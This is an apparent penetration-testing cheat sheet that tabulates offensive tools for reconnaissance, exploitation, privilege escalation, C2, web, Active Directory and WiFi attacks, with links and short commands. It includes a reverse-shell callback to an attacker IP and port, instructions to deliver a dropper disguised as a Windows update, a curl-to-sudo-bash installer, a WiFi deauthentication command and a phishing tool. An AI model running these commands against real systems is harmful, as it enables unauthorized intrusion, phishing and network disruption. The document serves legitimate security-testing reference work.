Contents
Information Gathering/ Enumeration
| Tool/Technique | Link | Description | Command/Example |
|---|---|---|---|
| NMAP – Network Mapper | NSEDoc Reference Portal Nmap Cheat Sheet Usage and Examples | Nmap Network Scanning Firewall/IDS Evasion and Spoofing | Nmap Network Scanning | Nmap is used to discover hosts and services on a computer network by sending packets and analyzing the responses. | nmap -sC -sV -p- --min-rate 10000 <target-ip> -oN output |
| Batea | https://github.com/delvelabs/batea | The goal of Batea is to allow security teams to automatically filter interesting network assets in large networks using nmap scan reports. | # Complete info $ sudo nmap -A 192.168.0.0/16 -oX output.xml # Partial info $ sudo nmap -O -sV 192.168.0.0/16 -oX output.xml |
| Binwalk | https://github.com/ReFirmLabs/binwalk | Binwalk is a fast, easy to use tool for analyzing, reverse engineering, and extracting firmware images. | # Extract any file that it finds binwalk -e firmware.bin |
| Blackeye | https://github.com/An0nUD4Y/blackeye https://www.geeksforgeeks.org/blackeye-phishing-tool-in-kali-linux/ | Create phishing webistes to phish information. | https://www.geeksforgeeks.org/blackeye-phishing-tool-in-kali-linux/ |
| Censys | https://censys.io/ | Censys reduces your Internet attack surface by continually discovering unknown assets and helping remediate Internet facing risks | https://search.censys.io/ |
| Shodan | https://www.shodan.io/ | Search Engine for the Internet of Everything | apache country:no port:80 http.status:200 |
| Dig | https://www.hostinger.com/tutorials/how-to-use-the-dig-command-in-linux/ | Dig (Domain Information Groper) is a command line utility that performs DNS lookup by querying name servers and displaying the result to you. | dig [server] [name] [type] |
| DNSdumpster | https://dnsdumpster.com/ | DNSdumpster.com is a FREE domain research tool that can discover hosts related to a domain. | Search for domain. |
| Enum4Linux | https://github.com/CiscoCXSecurity/enum4linux | Enum4linux is a tool for enumerating information from Windows and Samba systems | enum4linux -a host |
| EyeWitness | https://github.com/FortyNorthSecurity/EyeWitness | EyeWitness is designed to take screenshots of websites provide some server header info, and identify default credentials if known. | ./EyeWitness -f urls.txt --web |
| Insomnia | https://insomnia.rest/ | Run API queries with GUI | See website |
| Masscan | https://github.com/robertdavidgraham/masscan | This is an Internet-scale port scanner. It can scan the entire Internet in under 5 minutes, transmitting 10 million packets per second, from a single machine. | Scans the entire intenret masscan 0.0.0.0/0 -p0-65535 |
| Maltego | https://www.maltego.com/product-features/?utm_source=paterva.com&utm_medium=referral&utm_campaign=301 | Maltego1 is a very powerful data mining tool that offers an endless combination of search tools and strategies | |
| SIPvicious suite | https://github.com/EnableSecurity/sipvicious | SIPVicious OSS is a set of security tools that can be used to audit SIP based VoIP systems. Specifically, it allows you to find SIP servers, enumerate SIP extensions and finally, crack their password. | See github for full documentation |
| Steghide | http://steghide.sourceforge.net/ | Steghide is a steganography program that is able to hide data in various kinds of image- and audio-files. | $ steghide embed -cf picture.jpg -ef secret.txt Enter passphrase: Re-Enter passphrase: embedding "secret.txt" in "picture.jpg"... done |
| ODAT – Oracle Database Attacking Tool | https://github.com/quentinhardy/odat | ODAT (Oracle Database Attacking Tool) is an open source penetration testing tool that tests the security of Oracle Databases remotely. | See github. |
| theHarvester | https://github.com/laramies/theHarvester | The tool gathers names, emails, IPs, subdomains, and URLs | theharvester -d megacorpone.com -b googlex |
| Social searcher | https://www.social-searcher.com/ | Free Social Media Search Engine | n/a |
| Sn1per | https://github.com/1N3/Sn1per | Discover hidden assets and vulnerabilities in your environment | See github |
| gitleaks | GitHub – gitleaks/gitleaks: Protect and discover secrets using Gitleaks 🔑 | Gitleaks is a SAST tool for detecting and preventing hardcoded secrets like passwords, api keys, and tokens in git repos. | gitleaks detect --source . -v |
Exploitation
| Tool | Link | Description | Command/Example |
|---|---|---|---|
| MS17-010 | https://github.com/helviojunior/MS17-010 https://github.com/worawit/MS17-010 | Repository for EternalBlue exploit. | See repository. |
| MS10-059 | https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059:%20Chimichurri | ||
| Infectious Monkey | https://www.guardicore.com/infectionmonkey/ | Infection Monkey is a free open-source, network penetration testing tool. It is a breach and attack simulator that uses real-world attack techniques and known vulnerabilities. | https://woodward.digital/infection-monkey-network-penetration-testing/?v=c2f3f489a005 |
| Metsploit | https://www.offensive-security.com/metasploit-unleashed/exploits/ | Exploit vulnerabilites automatically. | msfconsole |
| Windows-php-reverse-shell | https://github.com/Dhayalanb/windows-php-reverse-shell | Simple php reverse shell implemented using binary , based on an webshell . | Usage : change the ip and port in the windows-php-reverse-shell.php file upload , set up an listener in you machine , access the windows-php-reverse-shell.php file on the server |
| SQLmap | https://github.com/sqlmapproject/sqlmap | sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. | To get a list of basic options and switches use:python sqlmap.py -h |
| IIS 6.0 BOF – RCE | https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269 | CVE-2017-7269 – Buffer Overflow in the ScStoragePathFromUrl function in webdav | python2 exploit.py targetip targetport srcip srcport |
| Drupalgeddon2 | https://github.com/dreadlocked/Drupalgeddon2 | Drupal core – Highly critical – Remote Code Execution – SA-CORE-2018-002 | ruby drupalgeddon2.rb TARGET |
| Windows Kernel Exploit List | https://github.com/SecWiki/windows-kernel-exploits | List of Kernel exploits | See github |
Password Crackers
| Tool | Link | Description | Command/Example |
|---|---|---|---|
| Hashcat | https://hashcat.net/hashcat/ | Hashcat is a password cracking tool. | See CheatSheet |
| Hydra | https://github.com/vanhauser-thc/thc-hydra | This tool is a proof of concept code, to give researchers and security consultants the possibility to show how easy it would be to gain unauthorized access from remote to a system. | See CheatSheet |
Privilege Escalation
| Tool | Link | OS | Description | Command/Example |
|---|---|---|---|---|
| BeRoot Project | https://github.com/AlessandroZ/BeRoot | Windows/Linux | BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege. | usage: beRoot.exe [-h] [-l]python beroot.py |
| Deepce | https://github.com/stealthcopter/deepce | N/A | Docker Enumeration, Escalation of Privileges and Container Escapes (DEEPCE) | # Make the script executable and then run it chmod +x ./deepce.sh ./deepce.sh |
| GTFObins | https://gtfobins.github.io/ | UNIX | GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems. | See website. |
| LinEnum | https://github.com/rebootuser/LinEnum | Linux | List possible PrivEsc Vectors | See github |
| linPEAS | https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS | Linux | List possbile privesc vectors | ./linpeas.sh |
| winPEAS | https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS | Windows | List possible privesc vectors | winpeas.exe or winpeas.bat |
| linuxprivchecker | https://github.com/linted/linuxprivchecker | Linux | List possible privesc vectors | https://github.com/linted/linuxprivchecker/blob/master/linuxprivchecker.py |
| linux-exploit-suggester | https://github.com/mzet-/linux-exploit-suggester | Linux | List possible privesc vectors. Run locally | ./linux-exploit-suggester.sh |
| windows-exploit-suggester | https://github.com/AonCyberLabs/Windows-Exploit-Suggester | Windows | List posbile privesc vectors. Run locally | ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt |
| PowerSploit\PowerUp.ps1 | https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc | Windows | PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations. | See full potentional i github. To execute on target, see my cheatsheet. |
| PowerSploit\PowerView.ps1 | https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993 | Windows | PowerView is series of functions that performs network and Windows domain enumeration and exploitation. | See full potentional i github. To execute on target, see my cheatsheet. |
| Juicy Potato | https://github.com/ohpe/juicy-potato | RottenPotatoNG and its variants leverages the privilege escalation chain based on BITS service having the MiTM listener on 127.0.0.1:6666 and when you have SeImpersonate or SeAssignPrimaryToken privileges. | ||
| MS10-059 Chimichurri | https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059:%20Chimichurri | Windows | Vulnerabilities in the Tracing Feature for Services Could Allow an Elevation of Privilege (982799) | chimichurri.exe attackerip attackerport |
| Polkit CVE-2021-4034 | https://github.com/joeammond/CVE-2021-4034 | Linux | polkit’s pkexec, a SUID-root program that is installed by default on every major Linux distribution: | python3 cve-2021-4034.py (run it on target to get root. |
Post-Exploitation
| Tool | Link | Description | Command/Example |
|---|---|---|---|
| C2 – Covenant | https://github.com/cobbr/Covenant | Covenant is a .NET command and control framework that aims to highlight the attack surface of .NET, make the use of offensive .NET tradecraft easier, and serve as a collaborative command and control platform for red teamers. | https://github.com/cobbr/Covenant/wiki/Installation-And-Startup |
| C2 – PoshC2 | https://github.com/nettitude/PoshC2 | PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming, post-exploitation and lateral movement. | See github |
| C2 – Cobalt Strike | https://www.cobaltstrike.com/ | Cobalt Strike gives you a post-exploitation agent and covert channels to emulate a quiet long-term embedded actor in your customer’s network. | https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/post-exploitation_main.htm?cshid=1085 |
| C2 – Empire | https://github.com/EmpireProject/Empire | Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent, and a pure Python 2.6/2.7 Linux/OS X agent | http://www.powershellempire.com/?page_id=83 |
| C2 – Starkiller (Empire frontend) | https://github.com/BC-SECURITY/Starkiller | Starkiller is a Frontend for Powershell Empire. | ./starkiller-<version>.AppImage --no-sandbox |
| C2 – Meterpreter | https://github.com/r00t-3xp10it/meterpeter | This PS1 starts a listener Server on a Windows|Linux attacker machine and generates oneliner PS reverse shell payloads obfuscated in BXOR with a random secret key and another layer of Characters/Variables Obfuscation to be executed on the victim machine | Deliver Dropper/Payload To Target Machine (apache2)USE THE 'Attack Vector URL' TO DELIVER 'Update-KB4524147.zip' (dropper) TO TARGET .. UNZIP (IN DESKTOP) AND EXECUTE 'Update-KB4524147.bat' (Run As Administrator).. |
| C2 – Alan Framework | https://github.com/enkomio/AlanFramework | Alan Framework is a post-exploitation framework useful during red-team activities. | https://www.youtube.com/watch?v=dgEBEAfEseY |
| C2 – Silver | https://github.com/BishopFox/sliver | Sliver is an open source cross-platform adversary emulation/red team framework, it can be used by organizations of all sizes to perform security testing. | Linux One Linercurl https://sliver.sh/install|sudo bash and then run sliver |
| Armitage | https://www.offensive-security.com/metasploit-unleashed/armitage/ | Armitage is a Java-based GUI front-end for the Metasploit Framework developed by Raphael Mudge. Its goal is to help security professionals better understand hacking and help them realize the power and potential of Metasploit. | https://www.offensive-security.com/metasploit-unleashed/armitage-exploitation/ |
| Chisel | https://github.com/jpillora/chisel | Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server. Chisel is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network. | $ chisel server --port $PORT --proxy http://example.com # listens on $PORT, proxy web requests to http://example.com |
| sshuttle | https://github.com/sshuttle/sshuttle#sshuttle-where-transparent-proxy-meets-vpn-meets-ssh | sshuttle allows you to create a VPN connection from your machine to any remote server that you can connect to via ssh | sshuttle [options] -r [username@]sshserver[:port] <subnets …> |
| lingolo-ng | https://github.com/tnpitsecurity/ligolo-ng | Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS). | See github |
| C2 – Havoc | Havoc (havocframework.com) GitHub – HavocFramework/Havoc: The Havoc Framework. | Havoc is a modern and malleable post-exploitation command and control framework, created by @C5pider. New C2 framework that can bypass Win 11 defender | See github |
| C2 – Brute ratel | Brute Ratel C4 | Badger doesn’t care. It takes what it wants! | A Customized Command and Control Center for Red Team and Adversary Simulation |
Web Application
| Tool | Link | Description | Command/Example |
|---|---|---|---|
| BurpSuite | https://portswigger.net/burp | Burp Suite is a framework of web appliccation pentesting tool. It is used to perform web app testing. | https://blog.aghanim.net/?p=732 |
| Dirb | https://github.com/v0re/dirb https://www.kali.org/tools/dirb/ | DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects. | dirb <url_base> <url_base> [<wordlist_file(s)>] [options] |
| Dirbpy | https://github.com/marcolivierbouch/dirbpy | This is a new version of dirb but in python. This version is faster than the normal version in C because it uses thread. Dirbpy is a Web Content Scanner. It looks for hidden Web Objects. | dirbpy -o https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/common.txt -u https://[....].com |
| Dirhunter | https://github.com/Nekmo/dirhunt | Dirhunt is a web crawler optimize for search and analyze directories. | $ dirhunt http://website.com/ |
| ffuf | https://github.com/ffuf/ffuf | A fast web fuzzer written in Go. | ffuf -w /path/to/wordlist -u https://target/FUZZ |
| Feroxbuster | https://github.com/epi052/feroxbuster | feroxbuster is a tool designed to perform Forced Browsing. | ./feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx |
| Gobuster | https://github.com/OJ/gobuster | Gobuster is a tool used to brute-force: URIs (directories and files) in web sites. DNS subdomains (with wildcard support). Virtual Host names on target web servers. Open Amazon S3 buckets | gobuster dir -u http:// -w wordlist |
| Fuxploider | https://github.com/almandin/fuxploider | This tool is able to detect the file types allowed to be uploaded and is able to detect which technique will work best to upload web shells or any malicious file on the desired web server. | python3 fuxploider.py --url https://awesomeFileUploadService.com --not-regex "wrong file type" |
| FuzzDB | https://github.com/fuzzdb-project/fuzzdb | Increase the likelihood of finding application security vulnerabilities through dynamic application security testing. | https://github.com/fuzzdb-project/fuzzdb/wiki/usagehints |
| Nikto | https://github.com/sullo/nikto | Nikto is web server scanner | nikto -h <target> |
| Raccoon | https://github.com/evyatarmeged/Raccoon | Offensive Security Tool for Reconnaissance and Information Gathering | Usage: raccoon [OPTIONS] TARGET |
| Sublist3r | https://github.com/aboul3la/Sublist3r | Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT. | To enumerate subdomains of specific domain:python sublist3r.py -d example.com |
| Joomscan | https://github.com/OWASP/joomscan | Automating the task of vulnerability detection and reliability assurance in Joomla CMS deployments | joomscan.pl [options] |
| Droopscan | https://github.com/SamJoan/droopescan | Supported CMS are: SilverStripe WordPress Drupal | droopescan scan drupal -u http://example.org/ -t 32 |
| Crawleet | https://github.com/truerandom/crawleet | Web Recon & Exploitaition Tool. | python crawleet.py -u <URL> |
| wafw00f | https://github.com/EnableSecurity/wafw00f | WAF Bypass | wafw00f http://target |
Active Directory Environment
| Tool | Link | Description | Command/Example |
|---|---|---|---|
| BloodHoundAD | https://github.com/BloodHoundAD/BloodHound | BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory or Azure environment. | https://bloodhound.readthedocs.io/en/latest/index.html |
| Impacket | https://github.com/SecureAuthCorp/impacket | Impacket is a collection of Python classes for working with network protocols. NOT LIMITED TO AD ENVIRONMENT. | https://www.secureauth.com/labs/open-source-tools/impacket/ |
| Nishang | https://github.com/samratashok/nishang | Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing. NOT LIMITED TO AD ENVIRONMENT | See github |
| PowerSploit | https://github.com/PowerShellMafia/PowerSploit | PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. NOT LIMITED TO AD ENVIRONMENT | See github |
Malware Analysis(MA)/ Buffer Overflow(BOF)
| Type | Tool | Link | Description | Command/Example |
|---|---|---|---|---|
| MA | Ghidra | https://ghidra-sre.org/ | A software reverse engineering (SRE) suite of tools developed by NSA’s Research Directorate in support of the Cybersecurity mission | https://github.com/NationalSecurityAgency/ghidra |
| BOF | Python GDB PEDA | https://github.com/longld/peda | PEDA – Python Exploit Development Assistance for GDB | See Github |
WiFi / Wireless
| Tool | Link | Description | Command/Example |
|---|---|---|---|
| Aircrack-ng | https://www.aircrack-ng.org/ | Aircrack-ng is a complete suite of tools to assess WiFi network security. Monitoring: Packet capture and export of data to text files for further processing by third party tools Attacking: Replay attacks, deauthentication, fake access points and others via packet injection Testing: Checking WiFi cards and driver capabilities (capture and injection) Cracking: WEP and WPA PSK (WPA 1 and 2) | #Deatuh attackaireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0# Start airodump-ng to collect authentication handshake airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0 |
| BoopSuite | https://github.com/MisterBianco/BoopSuite https://en.kali.tools/?p=462 | BoopSuite is a set of tools written in Python designed for wireless auditing and security testing. | BoopMon [-h] [-v] [-c [CHANNEL [CHANNEL ...]]] [-k] [-n NAME] -i {} [-m MAC] |
| Kismet | https://www.kismetwireless.net/ | Kismet is a wireless network and device detector, sniffer, wardriving tool, and WIDS (wireless intrusion detection) framework. | https://github.com/kismetwireless/kismet |